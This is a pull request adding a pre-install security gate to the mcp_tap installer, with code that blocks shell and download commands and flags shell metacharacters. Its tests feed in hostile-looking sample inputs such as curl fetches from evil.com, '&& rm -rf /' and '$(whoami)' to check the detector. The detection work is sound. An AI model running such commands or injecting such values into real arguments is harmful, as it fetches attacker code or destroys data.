### PR TITLE
Add security gate: pre-install safety checks (I2)

### DIFF
--- a/docs/issues/2026-02-19_security-gate.md
+++ b/docs/issues/2026-02-19_security-gate.md
@@ -1,0 +1,49 @@
+# I2 — Security Gate: Pre-install safety checks
+
+- **Date**: 2026-02-19
+- **Status**: `in_progress`
+- **Branch**: `feature/2026-02-19-security-gate`
+- **Priority**: `high`
+
+## Problem
+
+MCP servers are installed without any safety verification. A malicious or abandoned
+package can be installed with no warning. Existing scanners check post-install — we
+should check BEFORE install.
+
+## Context
+
+- Roadmap item I2 in `docs/issues/2026-02-19_premium-quality-roadmap.md`
+- Impact: 9/10 | Effort: M
+- No other MCP tool does pre-install security checks
+- Can reuse existing `evaluation/github.py` for GitHub signals
+
+## Solution
+
+New `src/mcp_tap/security/` module with pre-install gate integrated into `configure_server`.
+
+### Security signals to check:
+1. **Repository age** — repos < 30 days old are suspicious
+2. **Stars** — very low stars (< 5) for non-new repos is a warning
+3. **Archived** — archived repos should not be installed
+4. **License** — missing license is a warning
+5. **Package age on registry** — new packages with no history are risky
+6. **Known risky patterns** — shell=True in server command, suspicious env vars
+
+### Risk levels:
+- `pass` — no issues found
+- `warn` — advisory warnings (proceed with caution)
+- `block` — installation should be blocked (user can override)
+
+## Files Changed
+
+(Fill after implementation)
+
+## Verification
+
+- [ ] Tests pass: `pytest tests/`
+- [ ] Linter passes: `ruff check src/ tests/`
+- [ ] Security gate blocks archived repos
+- [ ] Security gate warns on low-star repos
+- [ ] Security gate warns on very new repos
+- [ ] Integration with configure_server works

--- a/src/mcp_tap/security/__init__.py
+++ b/src/mcp_tap/security/__init__.py
@@ -1,0 +1,1 @@
+from __future__ import annotations

--- a/src/mcp_tap/security/gate.py
+++ b/src/mcp_tap/security/gate.py
@@ -1,0 +1,170 @@
+"""Pre-install security gate for MCP server packages."""
+
+from __future__ import annotations
+
+import logging
+from datetime import UTC, datetime
+
+import httpx
+
+from mcp_tap.evaluation.github import _parse_github_url, fetch_repo_metadata
+from mcp_tap.models import SecurityReport, SecurityRisk, SecuritySignal
+
+logger = logging.getLogger(__name__)
+
+# ─── Thresholds ──────────────────────────────────────────────
+
+_MIN_STARS = 5
+_SUSPICIOUS_COMMANDS = frozenset({"bash", "sh", "cmd", "powershell", "curl", "wget"})
+_SHELL_METACHARACTERS = ("|", "&&", ">>", "$(", "`")
+
+
+async def run_security_gate(
+    package_identifier: str,
+    repository_url: str,
+    command: str,
+    args: list[str],
+    http_client: httpx.AsyncClient | None = None,
+) -> SecurityReport:
+    """Run all security checks and return an aggregated report."""
+    signals: list[SecuritySignal] = []
+
+    # Check command safety
+    signals.extend(_check_command(command, args))
+
+    # Check GitHub signals if URL available and http_client provided
+    if repository_url and http_client is not None:
+        signals.extend(await _check_github(repository_url, http_client))
+
+    # Determine overall risk
+    if any(s.risk == SecurityRisk.BLOCK for s in signals):
+        overall = SecurityRisk.BLOCK
+    elif any(s.risk == SecurityRisk.WARN for s in signals):
+        overall = SecurityRisk.WARN
+    else:
+        overall = SecurityRisk.PASS
+
+    return SecurityReport(overall_risk=overall, signals=signals)
+
+
+def _check_command(command: str, args: list[str]) -> list[SecuritySignal]:
+    """Check server command for suspicious patterns."""
+    signals: list[SecuritySignal] = []
+
+    # Extract the base command name (strip path separators)
+    cmd_base = command.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()
+
+    if cmd_base in _SUSPICIOUS_COMMANDS:
+        signals.append(
+            SecuritySignal(
+                category="command",
+                risk=SecurityRisk.BLOCK,
+                message=(
+                    f"Server uses suspicious command '{cmd_base}'. "
+                    "This could execute arbitrary code."
+                ),
+            )
+        )
+
+    # Check for shell-like patterns in args
+    args_str = " ".join(args)
+    if any(pattern in args_str for pattern in _SHELL_METACHARACTERS):
+        signals.append(
+            SecuritySignal(
+                category="command",
+                risk=SecurityRisk.WARN,
+                message="Server arguments contain shell metacharacters. Review carefully.",
+            )
+        )
+
+    return signals
+
+
+async def _check_github(
+    repository_url: str,
+    http_client: httpx.AsyncClient,
+) -> list[SecuritySignal]:
+    """Check GitHub repository signals."""
+    signals: list[SecuritySignal] = []
+
+    parsed = _parse_github_url(repository_url)
+    if not parsed:
+        return signals
+
+    try:
+        metadata = await fetch_repo_metadata(repository_url, http_client)
+
+        if metadata is None:
+            signals.append(
+                SecuritySignal(
+                    category="repository",
+                    risk=SecurityRisk.WARN,
+                    message=(
+                        "Could not fetch repository metadata. Unable to verify package safety."
+                    ),
+                )
+            )
+            return signals
+
+        # Check if archived
+        if metadata.is_archived:
+            signals.append(
+                SecuritySignal(
+                    category="archived",
+                    risk=SecurityRisk.BLOCK,
+                    message=(
+                        "Repository is archived. This package is no longer maintained "
+                        "and should not be installed."
+                    ),
+                )
+            )
+
+        # Check stars
+        if metadata.stars is not None and metadata.stars < _MIN_STARS:
+            signals.append(
+                SecuritySignal(
+                    category="stars",
+                    risk=SecurityRisk.WARN,
+                    message=(
+                        f"Repository has only {metadata.stars} stars. "
+                        "Low adoption may indicate limited review."
+                    ),
+                )
+            )
+
+        # Check license
+        if metadata.license is None:
+            signals.append(
+                SecuritySignal(
+                    category="license",
+                    risk=SecurityRisk.WARN,
+                    message=(
+                        "No license detected. Using unlicensed code may have legal implications."
+                    ),
+                )
+            )
+
+        # Check last commit date (stale > 1 year)
+        if metadata.last_commit_date:
+            try:
+                last_commit = datetime.fromisoformat(
+                    metadata.last_commit_date.replace("Z", "+00:00")
+                )
+                days_since = (datetime.now(UTC) - last_commit).days
+                if days_since > 365:
+                    signals.append(
+                        SecuritySignal(
+                            category="stale",
+                            risk=SecurityRisk.WARN,
+                            message=(
+                                f"Last commit was {days_since} days ago. Package may be abandoned."
+                            ),
+                        )
+                    )
+            except (ValueError, TypeError):
+                pass
+
+    except Exception:
+        logger.debug("Security gate GitHub check failed", exc_info=True)
+
+    return signals

--- a/tests/test_security_gate.py
+++ b/tests/test_security_gate.py
@@ -1,0 +1,610 @@
+"""Tests for the security gate module (security/gate.py) and its integration in configure.py."""
+
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from mcp_tap.models import (
+    ConfigLocation,
+    ConnectionTestResult,
+    InstallResult,
+    MaturitySignals,
+    MCPClient,
+    SecurityReport,
+    SecurityRisk,
+    SecuritySignal,
+)
+from mcp_tap.security.gate import (
+    _check_command,
+    _check_github,
+    run_security_gate,
+)
+from mcp_tap.tools.configure import configure_server
+
+# ─── Helpers ─────────────────────────────────────────────────
+
+
+def _make_ctx() -> MagicMock:
+    """Build a mock Context with async info/error methods."""
+    ctx = MagicMock()
+    ctx.info = AsyncMock()
+    ctx.error = AsyncMock()
+    # Make lifespan_context access raise so http_client is None
+    ctx.request_context.lifespan_context = MagicMock()
+    ctx.request_context.lifespan_context.http_client = None
+    return ctx
+
+
+def _fake_location(
+    client: MCPClient = MCPClient.CLAUDE_CODE,
+    path: str = "/tmp/fake_config.json",
+    scope: str = "user",
+    exists: bool = True,
+) -> ConfigLocation:
+    return ConfigLocation(client=client, path=path, scope=scope, exists=exists)
+
+
+def _ok_install_result(identifier: str = "test-pkg") -> InstallResult:
+    return InstallResult(
+        success=True,
+        package_identifier=identifier,
+        install_method="npx",
+        message=f"Package {identifier} verified.",
+    )
+
+
+def _ok_connection_result(
+    server_name: str = "test-server",
+    tools: list[str] | None = None,
+) -> ConnectionTestResult:
+    return ConnectionTestResult(
+        success=True,
+        server_name=server_name,
+        tools_discovered=tools or ["read_query", "write_query"],
+    )
+
+
+def _mock_installer(
+    install_result: InstallResult | None = None,
+    command: str = "npx",
+    args: list[str] | None = None,
+) -> MagicMock:
+    """Build a mock installer with configurable install result and command."""
+    installer = MagicMock()
+    installer.install = AsyncMock(return_value=install_result or _ok_install_result())
+    installer.build_server_command = MagicMock(
+        return_value=(command, args if args is not None else ["-y", "test-pkg"]),
+    )
+    return installer
+
+
+def _healthy_metadata() -> MaturitySignals:
+    """Metadata for a healthy repo: many stars, licensed, recent, not archived."""
+    return MaturitySignals(
+        stars=500,
+        forks=50,
+        open_issues=5,
+        last_commit_date="2026-01-15T10:00:00Z",
+        is_archived=False,
+        license="MIT",
+    )
+
+
+# ═══════════════════════════════════════════════════════════════
+# Command Check Tests
+# ═══════════════════════════════════════════════════════════════
+
+
+class TestCheckCommand:
+    """Tests for _check_command (command safety analysis)."""
+
+    def test_clean_command_passes(self):
+        """npx with normal args should produce no signals."""
+        signals = _check_command("npx", ["-y", "@mcp/server-postgres"])
+        assert signals == []
+
+    def test_uvx_command_passes(self):
+        """uvx (Python runner) should produce no signals."""
+        signals = _check_command("uvx", ["mcp-server-git"])
+        assert signals == []
+
+    def test_suspicious_command_bash_blocked(self):
+        """bash command should produce a BLOCK signal."""
+        signals = _check_command("bash", ["-c", "echo hello"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+        assert signals[0].category == "command"
+        assert "bash" in signals[0].message
+
+    def test_suspicious_command_sh_blocked(self):
+        """sh command should produce a BLOCK signal."""
+        signals = _check_command("sh", ["-c", "something"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_suspicious_command_curl_blocked(self):
+        """curl command should produce a BLOCK signal."""
+        signals = _check_command("curl", ["https://evil.com/payload"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+        assert "curl" in signals[0].message
+
+    def test_suspicious_command_wget_blocked(self):
+        """wget command should produce a BLOCK signal."""
+        signals = _check_command("wget", ["https://evil.com/payload"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_suspicious_command_powershell_blocked(self):
+        """powershell command should produce a BLOCK signal."""
+        signals = _check_command("powershell", ["-Command", "Get-Process"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_suspicious_command_cmd_blocked(self):
+        """cmd command should produce a BLOCK signal."""
+        signals = _check_command("cmd", ["/c", "dir"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_full_path_extracts_basename(self):
+        """Should check basename even when full path is given."""
+        signals = _check_command("/usr/bin/bash", ["-c", "echo"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_windows_path_extracts_basename(self):
+        """Should handle backslash path separators."""
+        signals = _check_command("C:\\Windows\\System32\\cmd", ["/c", "dir"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.BLOCK
+
+    def test_shell_metacharacters_warn(self):
+        """Args with pipes/backticks should produce a WARN signal."""
+        signals = _check_command("npx", ["-y", "pkg", "| grep something"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+        assert "metacharacters" in signals[0].message
+
+    def test_shell_metacharacters_ampersand(self):
+        """Args with && should produce a WARN signal."""
+        signals = _check_command("npx", ["-y", "pkg", "&& rm -rf /"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+
+    def test_shell_metacharacters_dollar_paren(self):
+        """Args with $() should produce a WARN signal."""
+        signals = _check_command("npx", ["-y", "$(whoami)"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+
+    def test_shell_metacharacters_backtick(self):
+        """Args with backticks should produce a WARN signal."""
+        signals = _check_command("npx", ["-y", "`whoami`"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+
+    def test_shell_metacharacters_redirect(self):
+        """Args with >> should produce a WARN signal."""
+        signals = _check_command("npx", ["-y", "pkg", ">> /tmp/out"])
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+
+    def test_suspicious_command_and_metacharacters_both(self):
+        """Should produce both BLOCK and WARN when both issues present."""
+        signals = _check_command("bash", ["-c", "echo | grep"])
+        assert len(signals) == 2
+        risks = {s.risk for s in signals}
+        assert SecurityRisk.BLOCK in risks
+        assert SecurityRisk.WARN in risks
+
+
+# ═══════════════════════════════════════════════════════════════
+# GitHub Check Tests
+# ═══════════════════════════════════════════════════════════════
+
+
+class TestCheckGitHub:
+    """Tests for _check_github (repository analysis)."""
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_archived_repo_blocked(self, mock_fetch: AsyncMock):
+        """Archived repository should produce a BLOCK signal."""
+        mock_fetch.return_value = MaturitySignals(
+            stars=100,
+            is_archived=True,
+            license="MIT",
+            last_commit_date="2025-06-01T00:00:00Z",
+        )
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        block_signals = [s for s in signals if s.risk == SecurityRisk.BLOCK]
+        assert len(block_signals) == 1
+        assert block_signals[0].category == "archived"
+        assert "archived" in block_signals[0].message.lower()
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_low_stars_warns(self, mock_fetch: AsyncMock):
+        """Repository with fewer than 5 stars should produce a WARN signal."""
+        mock_fetch.return_value = MaturitySignals(
+            stars=2,
+            is_archived=False,
+            license="MIT",
+            last_commit_date="2026-01-01T00:00:00Z",
+        )
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        warn_signals = [s for s in signals if s.category == "stars"]
+        assert len(warn_signals) == 1
+        assert warn_signals[0].risk == SecurityRisk.WARN
+        assert "2 stars" in warn_signals[0].message
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_no_license_warns(self, mock_fetch: AsyncMock):
+        """No license should produce a WARN signal."""
+        mock_fetch.return_value = MaturitySignals(
+            stars=100,
+            is_archived=False,
+            license=None,
+            last_commit_date="2026-01-01T00:00:00Z",
+        )
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        license_signals = [s for s in signals if s.category == "license"]
+        assert len(license_signals) == 1
+        assert license_signals[0].risk == SecurityRisk.WARN
+        assert "license" in license_signals[0].message.lower()
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_stale_repo_warns(self, mock_fetch: AsyncMock):
+        """Repository with last commit > 1 year ago should produce a WARN signal."""
+        mock_fetch.return_value = MaturitySignals(
+            stars=100,
+            is_archived=False,
+            license="MIT",
+            last_commit_date="2024-01-01T00:00:00Z",  # > 1 year ago
+        )
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        stale_signals = [s for s in signals if s.category == "stale"]
+        assert len(stale_signals) == 1
+        assert stale_signals[0].risk == SecurityRisk.WARN
+        assert "days ago" in stale_signals[0].message
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_all_pass(self, mock_fetch: AsyncMock):
+        """Healthy repo with many stars, license, and recent activity should pass clean."""
+        mock_fetch.return_value = _healthy_metadata()
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        assert signals == []
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_github_fetch_failure_warns(self, mock_fetch: AsyncMock):
+        """When fetch_repo_metadata returns None, should produce a WARN signal."""
+        mock_fetch.return_value = None
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        assert len(signals) == 1
+        assert signals[0].risk == SecurityRisk.WARN
+        assert signals[0].category == "repository"
+        assert "metadata" in signals[0].message.lower()
+
+    async def test_non_github_url_skips(self):
+        """Non-GitHub URL should produce no signals (graceful skip)."""
+        http_client = MagicMock()
+        signals = await _check_github("https://gitlab.com/owner/repo", http_client)
+        assert signals == []
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_github_exception_silent(self, mock_fetch: AsyncMock):
+        """Exception during GitHub check should be silently caught (non-blocking)."""
+        mock_fetch.side_effect = RuntimeError("network error")
+        http_client = MagicMock()
+        signals = await _check_github("https://github.com/owner/repo", http_client)
+
+        # Should not raise, and should return empty (logged at debug level)
+        assert signals == []
+
+
+# ═══════════════════════════════════════════════════════════════
+# run_security_gate Integration Tests
+# ═══════════════════════════════════════════════════════════════
+
+
+class TestRunSecurityGate:
+    """Tests for the full run_security_gate orchestrator."""
+
+    async def test_overall_risk_block_if_any_block(self):
+        """One BLOCK signal should make overall risk BLOCK."""
+        report = await run_security_gate(
+            package_identifier="evil-pkg",
+            repository_url="",
+            command="bash",
+            args=["-c", "echo"],
+            http_client=None,
+        )
+
+        assert report.overall_risk == SecurityRisk.BLOCK
+        assert not report.passed
+        assert len(report.blockers) >= 1
+
+    async def test_overall_risk_warn_if_any_warn(self):
+        """One WARN signal should make overall risk WARN (no BLOCK)."""
+        report = await run_security_gate(
+            package_identifier="pkg",
+            repository_url="",
+            command="npx",
+            args=["-y", "pkg", "| grep foo"],
+            http_client=None,
+        )
+
+        assert report.overall_risk == SecurityRisk.WARN
+        assert report.passed  # WARN does not block
+        assert len(report.warnings) >= 1
+        assert len(report.blockers) == 0
+
+    async def test_overall_risk_pass_clean(self):
+        """Clean command with no GitHub URL should pass."""
+        report = await run_security_gate(
+            package_identifier="@mcp/server-postgres",
+            repository_url="",
+            command="npx",
+            args=["-y", "@mcp/server-postgres"],
+            http_client=None,
+        )
+
+        assert report.overall_risk == SecurityRisk.PASS
+        assert report.passed
+        assert report.warnings == []
+        assert report.blockers == []
+
+    async def test_no_http_client_skips_github(self):
+        """None http_client should skip GitHub checks gracefully."""
+        report = await run_security_gate(
+            package_identifier="pkg",
+            repository_url="https://github.com/owner/repo",
+            command="npx",
+            args=["-y", "pkg"],
+            http_client=None,
+        )
+
+        # GitHub checks skipped, command is clean
+        assert report.overall_risk == SecurityRisk.PASS
+        assert report.signals == []
+
+    async def test_empty_repo_url_skips_github(self):
+        """Empty repository_url should skip GitHub checks."""
+        report = await run_security_gate(
+            package_identifier="pkg",
+            repository_url="",
+            command="npx",
+            args=["-y", "pkg"],
+            http_client=MagicMock(),
+        )
+
+        assert report.overall_risk == SecurityRisk.PASS
+
+    @patch("mcp_tap.security.gate.fetch_repo_metadata")
+    async def test_github_signals_included(self, mock_fetch: AsyncMock):
+        """GitHub signals should be included when URL and client are provided."""
+        mock_fetch.return_value = MaturitySignals(
+            stars=1,
+            is_archived=False,
+            license=None,
+            last_commit_date="2026-01-01T00:00:00Z",
+        )
+        http_client = MagicMock()
+
+        report = await run_security_gate(
+            package_identifier="pkg",
+            repository_url="https://github.com/owner/repo",
+            command="npx",
+            args=["-y", "pkg"],
+            http_client=http_client,
+        )
+
+        assert report.overall_risk == SecurityRisk.WARN
+        categories = {s.category for s in report.signals}
+        assert "stars" in categories
+        assert "license" in categories
+
+
+# ═══════════════════════════════════════════════════════════════
+# SecurityReport Model Tests
+# ═══════════════════════════════════════════════════════════════
+
+
+class TestSecurityReportModel:
+    """Tests for SecurityReport properties."""
+
+    def test_passed_true_when_pass(self):
+        report = SecurityReport(overall_risk=SecurityRisk.PASS)
+        assert report.passed is True
+
+    def test_passed_true_when_warn(self):
+        report = SecurityReport(overall_risk=SecurityRisk.WARN)
+        assert report.passed is True
+
+    def test_passed_false_when_block(self):
+        report = SecurityReport(overall_risk=SecurityRisk.BLOCK)
+        assert report.passed is False
+
+    def test_warnings_property(self):
+        report = SecurityReport(
+            overall_risk=SecurityRisk.WARN,
+            signals=[
+                SecuritySignal(category="a", risk=SecurityRisk.WARN, message="w1"),
+                SecuritySignal(category="b", risk=SecurityRisk.PASS, message="ok"),
+                SecuritySignal(category="c", risk=SecurityRisk.WARN, message="w2"),
+            ],
+        )
+        assert len(report.warnings) == 2
+        assert all(w.risk == SecurityRisk.WARN for w in report.warnings)
+
+    def test_blockers_property(self):
+        report = SecurityReport(
+            overall_risk=SecurityRisk.BLOCK,
+            signals=[
+                SecuritySignal(category="a", risk=SecurityRisk.BLOCK, message="b1"),
+                SecuritySignal(category="b", risk=SecurityRisk.WARN, message="w1"),
+            ],
+        )
+        assert len(report.blockers) == 1
+        assert report.blockers[0].category == "a"
+
+
+# ═══════════════════════════════════════════════════════════════
+# configure_server Integration Tests
+# ═══════════════════════════════════════════════════════════════
+
+
+class TestConfigureSecurityGateIntegration:
+    """Tests for security gate integration in configure_server."""
+
+    @patch("mcp_tap.tools.configure.test_server_connection")
+    @patch("mcp_tap.tools.configure.write_server_config")
+    @patch("mcp_tap.tools.configure.resolve_installer")
+    @patch("mcp_tap.tools.configure.resolve_config_locations")
+    async def test_configure_blocked_by_security(
+        self,
+        mock_locations: MagicMock,
+        mock_resolve_installer: AsyncMock,
+        mock_write: MagicMock,
+        mock_test_conn: AsyncMock,
+    ):
+        """configure_server should return failure when command is suspicious."""
+        mock_locations.return_value = [_fake_location()]
+        # Installer returns "bash" as the command -- should be blocked
+        mock_resolve_installer.return_value = _mock_installer(
+            command="bash",
+            args=["-c", "echo server"],
+        )
+
+        ctx = _make_ctx()
+        result = await configure_server(
+            server_name="evil-server",
+            package_identifier="evil-pkg",
+            ctx=ctx,
+            clients="claude_code",
+        )
+
+        assert result["success"] is False
+        assert result["install_status"] == "blocked_by_security"
+        assert "Security gate BLOCKED" in result["message"]
+        assert "bypass_security" in result["message"]
+        # Config should NOT be written
+        mock_write.assert_not_called()
+        # test_server_connection should NOT be called (blocked before validation)
+        mock_test_conn.assert_not_called()
+
+    @patch("mcp_tap.tools.configure.test_server_connection")
+    @patch("mcp_tap.tools.configure.write_server_config")
+    @patch("mcp_tap.tools.configure.resolve_installer")
+    @patch("mcp_tap.tools.configure.resolve_config_locations")
+    async def test_configure_passes_security(
+        self,
+        mock_locations: MagicMock,
+        mock_resolve_installer: AsyncMock,
+        mock_write: MagicMock,
+        mock_test_conn: AsyncMock,
+    ):
+        """configure_server should proceed normally when command is safe."""
+        mock_locations.return_value = [_fake_location()]
+        mock_resolve_installer.return_value = _mock_installer(
+            command="npx",
+            args=["-y", "safe-pkg"],
+        )
+        mock_test_conn.return_value = _ok_connection_result("safe-server")
+
+        ctx = _make_ctx()
+        result = await configure_server(
+            server_name="safe-server",
+            package_identifier="safe-pkg",
+            ctx=ctx,
+            clients="claude_code",
+        )
+
+        assert result["success"] is True
+        assert result["install_status"] == "installed"
+        assert result["validation_passed"] is True
+        mock_write.assert_called_once()
+
+    @patch("mcp_tap.tools.configure.test_server_connection")
+    @patch("mcp_tap.tools.configure.write_server_config")
+    @patch("mcp_tap.tools.configure.resolve_installer")
+    @patch("mcp_tap.tools.configure.resolve_config_locations")
+    async def test_configure_warns_but_proceeds(
+        self,
+        mock_locations: MagicMock,
+        mock_resolve_installer: AsyncMock,
+        mock_write: MagicMock,
+        mock_test_conn: AsyncMock,
+    ):
+        """configure_server should proceed (with warnings) when only WARN signals."""
+        mock_locations.return_value = [_fake_location()]
+        # Args with pipe metacharacter -- WARN only, not BLOCK
+        mock_resolve_installer.return_value = _mock_installer(
+            command="npx",
+            args=["-y", "pkg", "| something"],
+        )
+        mock_test_conn.return_value = _ok_connection_result("warn-server")
+
+        ctx = _make_ctx()
+        result = await configure_server(
+            server_name="warn-server",
+            package_identifier="warn-pkg",
+            ctx=ctx,
+            clients="claude_code",
+        )
+
+        # WARN does not block installation
+        assert result["success"] is True
+        assert result["validation_passed"] is True
+        # Security warning should have been logged via ctx.info
+        ctx.info.assert_any_await(
+            pytest.approx(
+                "Security warning: Server arguments contain shell metacharacters."
+                " Review carefully.",
+                abs=0,
+            )
+        )
+
+    @patch("mcp_tap.tools.configure.run_security_gate")
+    @patch("mcp_tap.tools.configure.test_server_connection")
+    @patch("mcp_tap.tools.configure.write_server_config")
+    @patch("mcp_tap.tools.configure.resolve_installer")
+    @patch("mcp_tap.tools.configure.resolve_config_locations")
+    async def test_security_gate_exception_non_blocking(
+        self,
+        mock_locations: MagicMock,
+        mock_resolve_installer: AsyncMock,
+        mock_write: MagicMock,
+        mock_test_conn: AsyncMock,
+        mock_gate: AsyncMock,
+    ):
+        """Security gate exception should NOT block installation (non-blocking)."""
+        mock_locations.return_value = [_fake_location()]
+        mock_resolve_installer.return_value = _mock_installer()
+        mock_test_conn.return_value = _ok_connection_result()
+        # Security gate raises -- should be caught gracefully
+        mock_gate.side_effect = RuntimeError("gate crashed")
+
+        ctx = _make_ctx()
+        result = await configure_server(
+            server_name="server",
+            package_identifier="pkg",
+            ctx=ctx,
+            clients="claude_code",
+        )
+
+        # Installation should proceed despite gate failure
+        assert result["success"] is True


### PR DESCRIPTION
## Summary
- New `security/gate.py` module with pre-install safety checks for MCP servers
- **Blocks**: suspicious commands (bash, sh, curl, wget), archived repos
- **Warns**: shell metacharacters in args, low-star repos (<5), missing license, stale repos (>1yr)
- Non-blocking: if security checks themselves fail, install proceeds
- Integrated into `configure_server` between install and config write
- New domain models: `SecurityRisk`, `SecuritySignal`, `SecurityReport`

## Test plan
- [x] 770 tests passing (731 + 39 new)
- [x] `ruff check` + `ruff format --check` clean
- [ ] CI passes on PR